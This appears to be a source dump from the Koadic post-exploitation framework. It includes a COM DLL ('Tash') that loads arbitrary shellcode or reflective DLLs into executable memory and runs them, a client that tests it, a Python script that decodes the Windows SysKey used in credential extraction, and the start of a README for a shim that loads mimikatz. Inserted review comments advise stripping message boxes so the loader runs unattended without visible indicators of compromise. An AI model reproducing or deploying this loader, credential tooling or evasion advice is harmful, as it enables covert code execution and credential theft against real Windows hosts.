-------------------------------------------------------------------------------- /data/bin/Tash/Tash.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/offsecginger/koadic/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/data/bin/Tash/Tash.suo -------------------------------------------------------------------------------- /data/bin/Tash/Tash/ReadMe.txt: -------------------------------------------------------------------------------- 1 | ======================================================================== 2 | ACTIVE TEMPLATE LIBRARY : Tash Project Overview 3 | ======================================================================== 4 | 5 | AppWizard has created this Tash project for you to use as the starting point for 6 | writing your Dynamic Link Library (DLL). 7 | 8 | This file contains a summary of what you will find in each of the files that 9 | make up your project. 10 | 11 | Tash.vcproj 12 | This is the main project file for VC++ projects generated using an Application Wizard. 13 | It contains information about the version of Visual C++ that generated the file, and 14 | information about the platforms, configurations, and project features selected with the 15 | Application Wizard. 16 | 17 | Tash.idl 18 | This file contains the IDL definitions of the type library, the interfaces 19 | and co-classes defined in your project. 20 | This file will be processed by the MIDL compiler to generate: 21 | C++ interface definitions and GUID declarations (Tash.h) 22 | GUID definitions (Tash_i.c) 23 | A type library (Tash.tlb) 24 | Marshaling code (Tash_p.c and dlldata.c) 25 | 26 | Tash.h 27 | This file contains the C++ interface definitions and GUID declarations of the 28 | items defined in Tash.idl. It will be regenerated by MIDL during compilation. 29 | 30 | Tash.cpp 31 | This file contains the object map and the implementation of your DLL's exports. 
32 | 33 | Tash.rc 34 | This is a listing of all of the Microsoft Windows resources that the 35 | program uses. 36 | 37 | Tash.def 38 | This module-definition file provides the linker with information about the exports 39 | required by your DLL. It contains exports for: 40 | DllGetClassObject 41 | DllCanUnloadNow 42 | DllRegisterServer 43 | DllUnregisterServer 44 | 45 | ///////////////////////////////////////////////////////////////////////////// 46 | Other standard files: 47 | 48 | StdAfx.h, StdAfx.cpp 49 | These files are used to build a precompiled header (PCH) file 50 | named Tash.pch and a precompiled types file named StdAfx.obj. 51 | 52 | Resource.h 53 | This is the standard header file that defines resource IDs. 54 | 55 | 56 | ///////////////////////////////////////////////////////////////////////////// 57 | -------------------------------------------------------------------------------- /data/bin/Tash/Tash/Tash.aps: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/offsecginger/koadic/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/data/bin/Tash/Tash/Tash.aps -------------------------------------------------------------------------------- /data/bin/Tash/Tash/Tash.cpp: -------------------------------------------------------------------------------- 1 | // Tash.cpp : Implementation of DLL Exports. 
2 | 3 | 4 | #include "stdafx.h" 5 | #include "resource.h" 6 | #include "Tash_i.h" 7 | #include "dllmain.h" 8 | #include "dlldatax.h" 9 | 10 | // Used to determine whether the DLL can be unloaded by OLE 11 | STDAPI DllCanUnloadNow(void) 12 | { 13 | #ifdef _MERGE_PROXYSTUB 14 | HRESULT hr = PrxDllCanUnloadNow(); 15 | if (hr != S_OK) 16 | return hr; 17 | #endif 18 | return _AtlModule.DllCanUnloadNow(); 19 | } 20 | 21 | 22 | // Returns a class factory to create an object of the requested type 23 | STDAPI DllGetClassObject(REFCLSID rclsid, REFIID riid, LPVOID* ppv) 24 | { 25 | LPOLESTR sClsIID; 26 | 27 | HRESULT hr = StringFromIID(rclsid, &sClsIID); 28 | 29 | if (FAILED(hr)) 30 | return hr; 31 | 
// NOTE(review): debugging artifact. This pops a modal dialog showing the
// requested CLSID on every class-object request and blocks until someone
// dismisses it. The loader is activated unattended by script
// (data/bin/Tash/Release/tash.x.js / tash.y.js via a registration-free
// ActCtx manifest), so this hangs the host and is a loud visible IOC.
// Remove it -- and the StringFromIID/CoTaskMemFree pair that only feeds it --
// or at minimum wrap it in #ifdef _DEBUG.
32 | MessageBoxW(NULL, sClsIID, L"Tash - DllGetClassObject()", MB_OK); 33 | 34 | CoTaskMemFree(sClsIID); 35 | 36 | #ifdef _MERGE_PROXYSTUB 37 | if (PrxDllGetClassObject(rclsid, riid, ppv) == S_OK) 38 | return S_OK; 39 | #endif 40 | return _AtlModule.DllGetClassObject(rclsid, riid, ppv); 41 | } 42 | 43 | 44 | // DllRegisterServer - Adds entries to the system registry 45 | STDAPI DllRegisterServer(void) 46 | { 47 | // registers object, typelib and all interfaces in typelib 48 | HRESULT hr = _AtlModule.DllRegisterServer(); 49 | #ifdef _MERGE_PROXYSTUB 50 | if (FAILED(hr)) 51 | return hr; 52 | hr = PrxDllRegisterServer(); 53 | #endif 54 | return hr; 55 | } 56 | 57 | 58 | // DllUnregisterServer - Removes entries from the system registry 59 | STDAPI DllUnregisterServer(void) 60 | { 61 | HRESULT hr = _AtlModule.DllUnregisterServer(); 62 | #ifdef _MERGE_PROXYSTUB 63 | if (FAILED(hr)) 64 | return hr; 65 | hr = PrxDllRegisterServer(); 66 | if (FAILED(hr)) 67 | return hr; 68 | hr = PrxDllUnregisterServer(); 69 | #endif 70 | return hr; 71 | } 72 | 73 | // DllInstall - Adds/Removes entries to the system registry per user 74 | // per machine. 
75 | STDAPI DllInstall(BOOL bInstall, LPCWSTR pszCmdLine) 76 | { 77 | HRESULT hr = E_FAIL; 78 | static const wchar_t szUserSwitch[] = _T("user"); 79 | 80 | if (pszCmdLine != NULL) 81 | { 82 | if (_wcsnicmp(pszCmdLine, szUserSwitch, _countof(szUserSwitch)) == 0) 83 | { 84 | AtlSetPerUserRegistration(true); 85 | } 86 | } 87 | 88 | if (bInstall) 89 | { 90 | hr = DllRegisterServer(); 91 | if (FAILED(hr)) 92 | { 93 | DllUnregisterServer(); 94 | } 95 | } 96 | else 97 | { 98 | hr = DllUnregisterServer(); 99 | } 100 | 101 | return hr; 102 | } 103 | 104 | 105 | -------------------------------------------------------------------------------- /data/bin/Tash/Tash/Tash.def: -------------------------------------------------------------------------------- 1 | ; Tash.def : Declares the module parameters. 2 | 3 | LIBRARY "Tash.DLL" 4 | 5 | EXPORTS 6 | DllCanUnloadNow PRIVATE 7 | DllGetClassObject PRIVATE 8 | DllRegisterServer PRIVATE 9 | DllUnregisterServer PRIVATE 10 | DllInstall PRIVATE 11 | -------------------------------------------------------------------------------- /data/bin/Tash/Tash/Tash.idl: -------------------------------------------------------------------------------- 1 | // Tash.idl : IDL source for Tash 2 | // 3 | 4 | // This file will be processed by the MIDL tool to 5 | // produce the type library (Tash.tlb) and marshalling code. 
6 | 7 | import "oaidl.idl"; 8 | import "ocidl.idl"; 9 | 10 | [ 11 | object, 12 | uuid(5FF70415-14AE-403D-AADD-A797348C8967), 13 | dual, 14 | nonextensible, 15 | helpstring("ITashLoader Interface"), 16 | pointer_default(unique) 17 | ] 18 | interface ITashLoader : IDispatch{ 19 | [id(1), helpstring("method Load")] HRESULT Load([in] BSTR sCode, [in] BSTR sParam, [in] ULONG dwOffset, [out,retval] ULONG* dwErr); 20 | }; 21 | [ 22 | uuid(830CFF36-9188-45DF-9EF3-D14C1D12A3A4), 23 | version(1.0), 24 | helpstring("Tash 1.0 Type Library") 25 | ] 26 | library TashLib 27 | { 28 | importlib("stdole2.tlb"); 29 | [ 30 | uuid(6AA5DEAB-5B77-4D09-BD8D-8EE26F2964AA), 31 | helpstring("TashLoader Class") 32 | ] 33 | coclass TashLoader 34 | { 35 | [default] interface ITashLoader; 36 | }; 37 | }; 38 | -------------------------------------------------------------------------------- /data/bin/Tash/Tash/Tash.rgs: -------------------------------------------------------------------------------- 1 | HKCR 2 | { 3 | NoRemove AppID 4 | { 5 | '%APPID%' = s 'Tash' 6 | 'Tash.DLL' 7 | { 8 | val AppID = s '%APPID%' 9 | } 10 | } 11 | } 12 | -------------------------------------------------------------------------------- /data/bin/Tash/Tash/TashLoader.cpp: -------------------------------------------------------------------------------- 1 | // TashLoader.cpp : Implementation of CTashLoader 2 | 3 | #include "stdafx.h" 4 | #include "TashLoader.h" 5 | 6 | 7 | // CTashLoader 8 | 9 | 10 | /** 11 | * sCode - shellcode/reflective DLL bytes, will be fixed from BSTR 12 | * sParam - parameter to pass to new thread, will NOT be fixed from BSTR 13 | * dwOffset - where in sCode buffer the entry point is (i.e. 
reflective loader export) 14 | * dwErr - returns win32 user errno 15 | */ 
// Copy the payload out of the BSTR into fresh memory, flip it RW -> RX (never
// RWX), and run it on a new thread starting at pAddr + dwOffset; blocks until
// that thread exits. HRESULT is always S_OK; the Win32 status goes to *dwErr.
16 | STDMETHODIMP CTashLoader::Load(BSTR sCode, BSTR sParam, ULONG dwOffset, ULONG* dwErr) 17 | { 18 | do 19 | { 20 | UINT dwSize = SysStringLen(sCode); 21 | 
// a zero-length payload is rejected here (VirtualAlloc fails on size 0).
22 | PVOID pAddr = VirtualAlloc(NULL, dwSize, MEM_COMMIT, PAGE_READWRITE); 23 | 24 | if (pAddr == NULL) 25 | break; 26 | 27 | // every-other byte memcpy because of BSTR wchar_t 28 | for (UINT i = 0; i < dwSize; ++i) 29 | { 
// keeps only the low byte of each UTF-16 code unit: the script caller must
// build the string so every char is <= 0xFF (tash.x.js passes "\x90\x90\xc3");
// anything wider is silently truncated. sParam is NOT narrowed -- the thread
// receives the raw wide string.
30 | ((BYTE*)pAddr)[i] = ((BYTE*)sCode)[i * 2]; 31 | //printf("%02x ", ((BYTE*)pAddr)[i]); 32 | } 33 | 34 | DWORD dwOldProtect; 35 | 36 | if (!VirtualProtect(pAddr, dwSize, PAGE_EXECUTE_READ, &dwOldProtect)) 37 | break; 38 | 
// NOTE(review): dwOffset is never checked against dwSize, so a caller can
// start execution anywhere past the buffer. Add before this call:
//   if (dwOffset >= dwSize) { SetLastError(ERROR_INVALID_PARAMETER); break; }
39 | HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE) ((BYTE*)pAddr + dwOffset), (PVOID)sParam, 0, NULL); 40 | 41 | if (hThread == NULL) 42 | break; 43 | 
// hThread is never CloseHandle()d and pAddr is never released; both leak for
// the life of the host. Acceptable if the host exits right after (as the
// comment says), not if this object is reused. A failed wait is not reported.
44 | // wait for shellcode/reflective DLL to complete its operations, process will die quickly after we return 45 | WaitForSingleObject(hThread, INFINITE); 46 | 
// on the early-break paths *dwErr carries the failing API's last error.
47 | SetLastError(ERROR_SUCCESS); 48 | } while (0); 49 | /* */ 50 | 51 | *dwErr = GetLastError(); 52 | return S_OK; 53 | } -------------------------------------------------------------------------------- /data/bin/Tash/Tash/TashLoader.h: -------------------------------------------------------------------------------- 1 | // TashLoader.h : Declaration of the CTashLoader 2 | 3 | #pragma once 4 | #include "resource.h" // main symbols 5 | 6 | #include "Tash_i.h" 7 | 8 | 9 | #if defined(_WIN32_WCE) && !defined(_CE_DCOM) && !defined(_CE_ALLOW_SINGLE_THREADED_OBJECTS_IN_MTA) 10 | #error "Single-threaded COM objects are not properly supported on Windows CE platform, such as the Windows Mobile platforms that do not include full DCOM support. Define _CE_ALLOW_SINGLE_THREADED_OBJECTS_IN_MTA to force ATL to support creating single-thread COM object's and allow use of it's single-threaded COM object implementations. 
The threading model in your rgs file was set to 'Free' as that is the only threading model supported in non DCOM Windows CE platforms." 11 | #endif 12 | 13 | 14 | 15 | // CTashLoader 16 | 17 | class ATL_NO_VTABLE CTashLoader : 18 | public CComObjectRootEx, 19 | public CComCoClass, 20 | public IDispatchImpl 21 | { 22 | public: 23 | CTashLoader() 24 | { 25 | } 26 | 27 | DECLARE_REGISTRY_RESOURCEID(IDR_TASHLOADER) 28 | 29 | 30 | BEGIN_COM_MAP(CTashLoader) 31 | COM_INTERFACE_ENTRY(ITashLoader) 32 | COM_INTERFACE_ENTRY(IDispatch) 33 | END_COM_MAP() 34 | 35 | 36 | 37 | DECLARE_PROTECT_FINAL_CONSTRUCT() 38 | 39 | HRESULT FinalConstruct() 40 | { 41 | return S_OK; 42 | } 43 | 44 | void FinalRelease() 45 | { 46 | } 47 | 48 | public: 49 | 50 | STDMETHOD(Load)(BSTR sCode, BSTR sParam, ULONG dwOffset, ULONG* dwErr); 51 | }; 52 | 53 | OBJECT_ENTRY_AUTO(__uuidof(TashLoader), CTashLoader) 54 | -------------------------------------------------------------------------------- /data/bin/Tash/Tash/TashLoader.rgs: -------------------------------------------------------------------------------- 1 | HKCR 2 | { 3 | Tash.TashLoader.1 = s 'TashLoader Class' 4 | { 5 | CLSID = s '{6AA5DEAB-5B77-4D09-BD8D-8EE26F2964AA}' 6 | } 7 | Tash.TashLoader = s 'TashLoader Class' 8 | { 9 | CLSID = s '{6AA5DEAB-5B77-4D09-BD8D-8EE26F2964AA}' 10 | CurVer = s 'Tash.TashLoader.1' 11 | } 12 | NoRemove CLSID 13 | { 14 | ForceRemove {6AA5DEAB-5B77-4D09-BD8D-8EE26F2964AA} = s 'TashLoader Class' 15 | { 16 | ProgID = s 'Tash.TashLoader.1' 17 | VersionIndependentProgID = s 'Tash.TashLoader' 18 | ForceRemove 'Programmable' 19 | InprocServer32 = s '%MODULE%' 20 | { 21 | val ThreadingModel = s 'Both' 22 | } 23 | 'TypeLib' = s '{830CFF36-9188-45DF-9EF3-D14C1D12A3A4}' 24 | } 25 | } 26 | } 27 | -------------------------------------------------------------------------------- /data/bin/Tash/Tash/Tash_i.c: -------------------------------------------------------------------------------- 1 | 2 | 3 | /* this ALWAYS GENERATED file 
contains the IIDs and CLSIDs */ 4 | 5 | /* link this file in with the server and any clients */ 6 | 7 | 8 | /* File created by MIDL compiler version 7.00.0500 */ 9 | /* at Mon Mar 25 00:42:22 2019 10 | */ 11 | /* Compiler settings for .\Tash.idl: 12 | Oicf, W1, Zp8, env=Win32 (32b run) 13 | protocol : dce , ms_ext, c_ext, robust 14 | error checks: stub_data 15 | VC __declspec() decoration level: 16 | __declspec(uuid()), __declspec(selectany), __declspec(novtable) 17 | DECLSPEC_UUID(), MIDL_INTERFACE() 18 | */ 19 | //@@MIDL_FILE_HEADING( ) 20 | 21 | #pragma warning( disable: 4049 ) /* more than 64k source lines */ 22 | 23 | 24 | #ifdef __cplusplus 25 | extern "C"{ 26 | #endif 27 | 28 | 29 | #include 30 | #include 31 | 32 | #ifdef _MIDL_USE_GUIDDEF_ 33 | 34 | #ifndef INITGUID 35 | #define INITGUID 36 | #include 37 | #undef INITGUID 38 | #else 39 | #include 40 | #endif 41 | 42 | #define MIDL_DEFINE_GUID(type,name,l,w1,w2,b1,b2,b3,b4,b5,b6,b7,b8) \ 43 | DEFINE_GUID(name,l,w1,w2,b1,b2,b3,b4,b5,b6,b7,b8) 44 | 45 | #else // !_MIDL_USE_GUIDDEF_ 46 | 47 | #ifndef __IID_DEFINED__ 48 | #define __IID_DEFINED__ 49 | 50 | typedef struct _IID 51 | { 52 | unsigned long x; 53 | unsigned short s1; 54 | unsigned short s2; 55 | unsigned char c[8]; 56 | } IID; 57 | 58 | #endif // __IID_DEFINED__ 59 | 60 | #ifndef CLSID_DEFINED 61 | #define CLSID_DEFINED 62 | typedef IID CLSID; 63 | #endif // CLSID_DEFINED 64 | 65 | #define MIDL_DEFINE_GUID(type,name,l,w1,w2,b1,b2,b3,b4,b5,b6,b7,b8) \ 66 | const type name = {l,w1,w2,{b1,b2,b3,b4,b5,b6,b7,b8}} 67 | 68 | #endif !_MIDL_USE_GUIDDEF_ 69 | 70 | MIDL_DEFINE_GUID(IID, IID_ITashLoader,0x5FF70415,0x14AE,0x403D,0xAA,0xDD,0xA7,0x97,0x34,0x8C,0x89,0x67); 71 | 72 | 73 | MIDL_DEFINE_GUID(IID, LIBID_TashLib,0x830CFF36,0x9188,0x45DF,0x9E,0xF3,0xD1,0x4C,0x1D,0x12,0xA3,0xA4); 74 | 75 | 76 | MIDL_DEFINE_GUID(CLSID, CLSID_TashLoader,0x6AA5DEAB,0x5B77,0x4D09,0xBD,0x8D,0x8E,0xE2,0x6F,0x29,0x64,0xAA); 77 | 78 | #undef MIDL_DEFINE_GUID 79 | 80 | #ifdef 
__cplusplus 81 | } 82 | #endif 83 | 84 | 85 | 86 | -------------------------------------------------------------------------------- /data/bin/Tash/Tash/dlldata.c: -------------------------------------------------------------------------------- 1 | /********************************************************* 2 | DllData file -- generated by MIDL compiler 3 | 4 | DO NOT ALTER THIS FILE 5 | 6 | This file is regenerated by MIDL on every IDL file compile. 7 | 8 | To completely reconstruct this file, delete it and rerun MIDL 9 | on all the IDL files in this DLL, specifying this file for the 10 | /dlldata command line option 11 | 12 | *********************************************************/ 13 | 14 | #define PROXY_DELEGATION 15 | 16 | #include 17 | 18 | #ifdef __cplusplus 19 | extern "C" { 20 | #endif 21 | 22 | EXTERN_PROXY_FILE( Tash ) 23 | 24 | 25 | PROXYFILE_LIST_START 26 | /* Start of list */ 27 | REFERENCE_PROXY_FILE( Tash ), 28 | /* End of list */ 29 | PROXYFILE_LIST_END 30 | 31 | 32 | DLLDATA_ROUTINES( aProxyFileList, GET_DLL_CLSID ) 33 | 34 | #ifdef __cplusplus 35 | } /*extern "C" */ 36 | #endif 37 | 38 | /* end of generated dlldata file */ 39 | -------------------------------------------------------------------------------- /data/bin/Tash/Tash/dlldatax.c: -------------------------------------------------------------------------------- 1 | // wrapper for dlldata.c 2 | 3 | #ifdef _MERGE_PROXYSTUB // merge proxy stub DLL 4 | 5 | #define REGISTER_PROXY_DLL //DllRegisterServer, etc. 
6 | 7 | #define _WIN32_WINNT 0x0500 //for WinNT 4.0 or Win95 with DCOM 8 | #define USE_STUBLESS_PROXY //defined only with MIDL switch /Oicf 9 | 10 | #pragma comment(lib, "rpcns4.lib") 11 | #pragma comment(lib, "rpcrt4.lib") 12 | 13 | #define ENTRY_PREFIX Prx 14 | 15 | #include "dlldata.c" 16 | #include "Tash_p.c" 17 | 18 | #endif //_MERGE_PROXYSTUB 19 | -------------------------------------------------------------------------------- /data/bin/Tash/Tash/dlldatax.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #ifdef _MERGE_PROXYSTUB 4 | 5 | extern "C" 6 | { 7 | BOOL WINAPI PrxDllMain(HINSTANCE hInstance, DWORD dwReason, 8 | LPVOID lpReserved); 9 | STDAPI PrxDllCanUnloadNow(void); 10 | STDAPI PrxDllGetClassObject(REFCLSID rclsid, REFIID riid, LPVOID* ppv); 11 | STDAPI PrxDllRegisterServer(void); 12 | STDAPI PrxDllUnregisterServer(void); 13 | } 14 | 15 | #endif 16 | -------------------------------------------------------------------------------- /data/bin/Tash/Tash/dllmain.cpp: -------------------------------------------------------------------------------- 1 | // dllmain.cpp : Implementation of DllMain. 2 | 3 | #include "stdafx.h" 4 | #include "resource.h" 5 | #include "Tash_i.h" 6 | #include "dllmain.h" 7 | #include "dlldatax.h" 8 | 9 | CTashModule _AtlModule; 10 | 11 | // DLL Entry Point 12 | extern "C" BOOL WINAPI DllMain(HINSTANCE hInstance, DWORD dwReason, LPVOID lpReserved) 13 | { 14 | MessageBoxW(NULL, L"Tash loaded!", L"Tash", MB_OK); 15 | #ifdef _MERGE_PROXYSTUB 16 | if (!PrxDllMain(hInstance, dwReason, lpReserved)) 17 | return FALSE; 18 | #endif 19 | hInstance; 20 | return _AtlModule.DllMain(dwReason, lpReserved); 21 | } 22 | -------------------------------------------------------------------------------- /data/bin/Tash/Tash/dllmain.h: -------------------------------------------------------------------------------- 1 | // dllmain.h : Declaration of module class. 
2 | 3 | class CTashModule : public CAtlDllModuleT< CTashModule > 4 | { 5 | public : 6 | DECLARE_LIBID(LIBID_TashLib) 7 | DECLARE_REGISTRY_APPID_RESOURCEID(IDR_TASH, "{15CC4D83-F062-4D2F-AFFD-645527ED9C67}") 8 | }; 9 | 10 | extern class CTashModule _AtlModule; 11 | -------------------------------------------------------------------------------- /data/bin/Tash/Tash/resource.h: -------------------------------------------------------------------------------- 1 | //{{NO_DEPENDENCIES}} 2 | // Microsoft Visual C++ generated include file. 3 | // Used by Tash.rc 4 | // 5 | #define IDS_PROJNAME 100 6 | #define IDR_TASH 101 7 | #define IDR_TASHLOADER 102 8 | 9 | // Next default values for new objects 10 | // 11 | #ifdef APSTUDIO_INVOKED 12 | #ifndef APSTUDIO_READONLY_SYMBOLS 13 | #define _APS_NEXT_RESOURCE_VALUE 201 14 | #define _APS_NEXT_COMMAND_VALUE 32768 15 | #define _APS_NEXT_CONTROL_VALUE 201 16 | #define _APS_NEXT_SYMED_VALUE 103 17 | #endif 18 | #endif 19 | -------------------------------------------------------------------------------- /data/bin/Tash/Tash/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // Tash.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | -------------------------------------------------------------------------------- /data/bin/Tash/Tash/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, 3 | // but are changed infrequently 4 | 5 | #pragma once 6 | 7 | #ifndef STRICT 8 | #define STRICT 9 | #endif 10 | 11 | #include "targetver.h" 12 | 13 | #define _ATL_APARTMENT_THREADED 14 | #define _ATL_NO_AUTOMATIC_NAMESPACE 15 | 16 | #define _ATL_CSTRING_EXPLICIT_CONSTRUCTORS // some 
CString constructors will be explicit 17 | 18 | #include "resource.h" 19 | #include 20 | #include 21 | #include 22 | 23 | using namespace ATL; 24 | -------------------------------------------------------------------------------- /data/bin/Tash/Tash/targetver.h: -------------------------------------------------------------------------------- 1 | 2 | #pragma once 3 | 4 | // The following macros define the minimum required platform. The minimum required platform 5 | // is the earliest version of Windows, Internet Explorer etc. that has the necessary features to run 6 | // your application. The macros work by enabling all features available on platform versions up to and 7 | // including the version specified. 8 | 9 | // Modify the following defines if you have to target a platform prior to the ones specified below. 10 | // Refer to MSDN for the latest info on corresponding values for different platforms. 11 | #ifndef WINVER // Specifies that the minimum required platform is Windows Vista. 12 | #define WINVER 0x0600 // Change this to the appropriate value to target other versions of Windows. 13 | #endif 14 | 15 | #ifndef _WIN32_WINNT // Specifies that the minimum required platform is Windows Vista. 16 | #define _WIN32_WINNT 0x0600 // Change this to the appropriate value to target other versions of Windows. 17 | #endif 18 | 19 | #ifndef _WIN32_WINDOWS // Specifies that the minimum required platform is Windows 98. 20 | #define _WIN32_WINDOWS 0x0410 // Change this to the appropriate value to target Windows Me or later. 21 | #endif 22 | 23 | #ifndef _WIN32_IE // Specifies that the minimum required platform is Internet Explorer 7.0. 24 | #define _WIN32_IE 0x0700 // Change this to the appropriate value to target other versions of IE. 
25 | #endif 26 | 27 | -------------------------------------------------------------------------------- /data/bin/Tash/TashClient/ReadMe.txt: -------------------------------------------------------------------------------- 1 | ======================================================================== 2 | CONSOLE APPLICATION : TashClient Project Overview 3 | ======================================================================== 4 | 5 | AppWizard has created this TashClient application for you. 6 | 7 | This file contains a summary of what you will find in each of the files that 8 | make up your TashClient application. 9 | 10 | 11 | TashClient.vcproj 12 | This is the main project file for VC++ projects generated using an Application Wizard. 13 | It contains information about the version of Visual C++ that generated the file, and 14 | information about the platforms, configurations, and project features selected with the 15 | Application Wizard. 16 | 17 | TashClient.cpp 18 | This is the main application source file. 19 | 20 | ///////////////////////////////////////////////////////////////////////////// 21 | Other standard files: 22 | 23 | StdAfx.h, StdAfx.cpp 24 | These files are used to build a precompiled header (PCH) file 25 | named TashClient.pch and a precompiled types file named StdAfx.obj. 26 | 27 | ///////////////////////////////////////////////////////////////////////////// 28 | Other notes: 29 | 30 | AppWizard uses "TODO:" comments to indicate parts of the source code you 31 | should add to or customize. 32 | 33 | ///////////////////////////////////////////////////////////////////////////// 34 | -------------------------------------------------------------------------------- /data/bin/Tash/TashClient/TashClient.cpp: -------------------------------------------------------------------------------- 1 | // TashClient.cpp : Defines the entry point for the console application. 
2 | // 3 | 4 | #include "stdafx.h" 5 | 6 | #include 7 | 8 | void ErrorDescription(HRESULT hr) 9 | { 10 | TCHAR* szErrMsg; 11 | if (FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER| FORMAT_MESSAGE_FROM_SYSTEM, NULL, hr, 12 | MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), (LPTSTR)&szErrMsg, 0, NULL) != 0) 13 | { 14 | std::wcout << szErrMsg << std::endl; 15 | LocalFree(szErrMsg); 16 | } 17 | else 18 | { 19 | std::cout << "Could not find a description for error 0x" << std::hex << hr << std::dec << std::endl; 20 | } 21 | } 22 | 23 | int _tmain(int argc, _TCHAR* argv[]) 24 | { 25 | CoInitializeEx(0, COINIT_MULTITHREADED); 26 | 27 | ACTCTX actCtx = { 0 }; 28 | actCtx.cbSize = sizeof(ACTCTX); 29 | actCtx.lpSource = L"Tash.X.manifest"; 30 | 31 | HANDLE hCtx = CreateActCtx(&actCtx); 32 | 33 | if (hCtx != INVALID_HANDLE_VALUE) 34 | { 35 | ULONG_PTR cookie; 36 | if (::ActivateActCtx(hCtx, &cookie)) 37 | { 38 | { 39 | ITashLoaderPtr ptr; 40 | HRESULT hr = ptr.CreateInstance(__uuidof(TashLoader)); 41 | 42 | if (SUCCEEDED(hr)) 43 | { 44 | BSTR sCode = SysAllocString(L"\xcc\x90\x90\xc3"); 45 | std::cout << ptr->Load(sCode, (BSTR)NULL, 1) << std::endl; 46 | 47 | SysFreeString(sCode); 48 | } 49 | 50 | ErrorDescription(hr); 51 | } 52 | 53 | DeactivateActCtx(0, cookie); 54 | } 55 | } 56 | 57 | 58 | CoUninitialize(); 59 | 60 | return 0; 61 | } 62 | 63 | -------------------------------------------------------------------------------- /data/bin/Tash/TashClient/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // TashClient.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this file 9 | -------------------------------------------------------------------------------- /data/bin/Tash/TashClient/stdafx.h: 
-------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #define _WIN32_DCOM 9 | #define _WIN32_FUSION 0x0100 10 | 11 | #include "targetver.h" 12 | 13 | #include 14 | #include 15 | 16 | 17 | #define _ATL_CSTRING_EXPLICIT_CONSTRUCTORS // some CString constructors will be explicit 18 | 19 | #include 20 | #include 21 | 22 | #import "..\Release\Tash.dll" no_namespace 23 | 24 | // TODO: reference additional headers your program requires here 25 | -------------------------------------------------------------------------------- /data/bin/Tash/TashClient/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // The following macros define the minimum required platform. The minimum required platform 4 | // is the earliest version of Windows, Internet Explorer etc. that has the necessary features to run 5 | // your application. The macros work by enabling all features available on platform versions up to and 6 | // including the version specified. 7 | 8 | // Modify the following defines if you have to target a platform prior to the ones specified below. 9 | // Refer to MSDN for the latest info on corresponding values for different platforms. 10 | #ifndef WINVER // Specifies that the minimum required platform is Windows Vista. 11 | #define WINVER 0x0600 // Change this to the appropriate value to target other versions of Windows. 12 | #endif 13 | 14 | #ifndef _WIN32_WINNT // Specifies that the minimum required platform is Windows Vista. 15 | #define _WIN32_WINNT 0x0600 // Change this to the appropriate value to target other versions of Windows. 16 | #endif 17 | 18 | #ifndef _WIN32_WINDOWS // Specifies that the minimum required platform is Windows 98. 
19 | #define _WIN32_WINDOWS 0x0410 // Change this to the appropriate value to target Windows Me or later. 20 | #endif 21 | 22 | #ifndef _WIN32_IE // Specifies that the minimum required platform is Internet Explorer 7.0. 23 | #define _WIN32_IE 0x0700 // Change this to the appropriate value to target other versions of IE. 24 | #endif 25 | -------------------------------------------------------------------------------- /data/bin/decode_syskey.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | 3 | import sys 4 | 5 | syskey_data_file = sys.argv[1] 6 | 7 | tmp_syskey = "" 8 | syskey = "" 9 | with open(syskey_data_file, 'rb') as syskeyfile: 10 | file_contents = syskeyfile.read() 11 | 12 | i = 4220 13 | while i < 28811: 14 | j = i + 15 15 | while i < j: 16 | tmp_syskey += file_contents[i:i+1].decode() 17 | i += 2 18 | i += 8176 19 | 20 | tmp_syskey = list(map(''.join, zip(*[iter(tmp_syskey)]*2))) 21 | 22 | transforms = [8, 5, 4, 2, 11, 9, 13, 3, 0, 6, 1, 12, 14, 10, 15, 7] 23 | for i in transforms: 24 | syskey += tmp_syskey[i] 25 | 26 | print("decoded SysKey: 0x%s" % syskey) 27 | -------------------------------------------------------------------------------- /data/bin/dynwrapx.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/offsecginger/koadic/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/data/bin/dynwrapx.dll -------------------------------------------------------------------------------- /data/bin/mimishim.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/offsecginger/koadic/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/data/bin/mimishim.dll -------------------------------------------------------------------------------- /data/bin/mimishim.x64.dll: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/offsecginger/koadic/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/data/bin/mimishim.x64.dll -------------------------------------------------------------------------------- /data/bin/mimishim/README.md: -------------------------------------------------------------------------------- 1 | # mimishim 2 | 3 | mimishim.dll is a reflective DLL that shims Koadic C3 and powerkatz.dll 4 | 5 | Screenshot: http://shellcorp.org/koadikatz.png 6 | 7 | ### Methodology 8 | 9 | Several issues arise when trying to use the "well-known" powerkatz.dll straight from a Koadic job. 10 | 11 | 1. We might be an x86 process on an x64 CPU; mimikatz only works correctly from a process of the same architecture 12 | 2. We cannot reflectively load with a stub in JScript (Empire does it all in PowerShell) because we will run out of instructions ("A script is taking too long, want to continue?" dialog) 13 | 3. Even if powerkatz.dll just used normal reflective injection instead, Wow64->x64 still requires a ton of shellcode sorcery 14 | 15 | So we have this shim DLL that has the reflective loader built in and uses a pre-calculated offset to minimize the JScript code. 16 | 17 | DllMain basically does the following: 18 | 19 | 1. Detect if WOW64 Process (aka 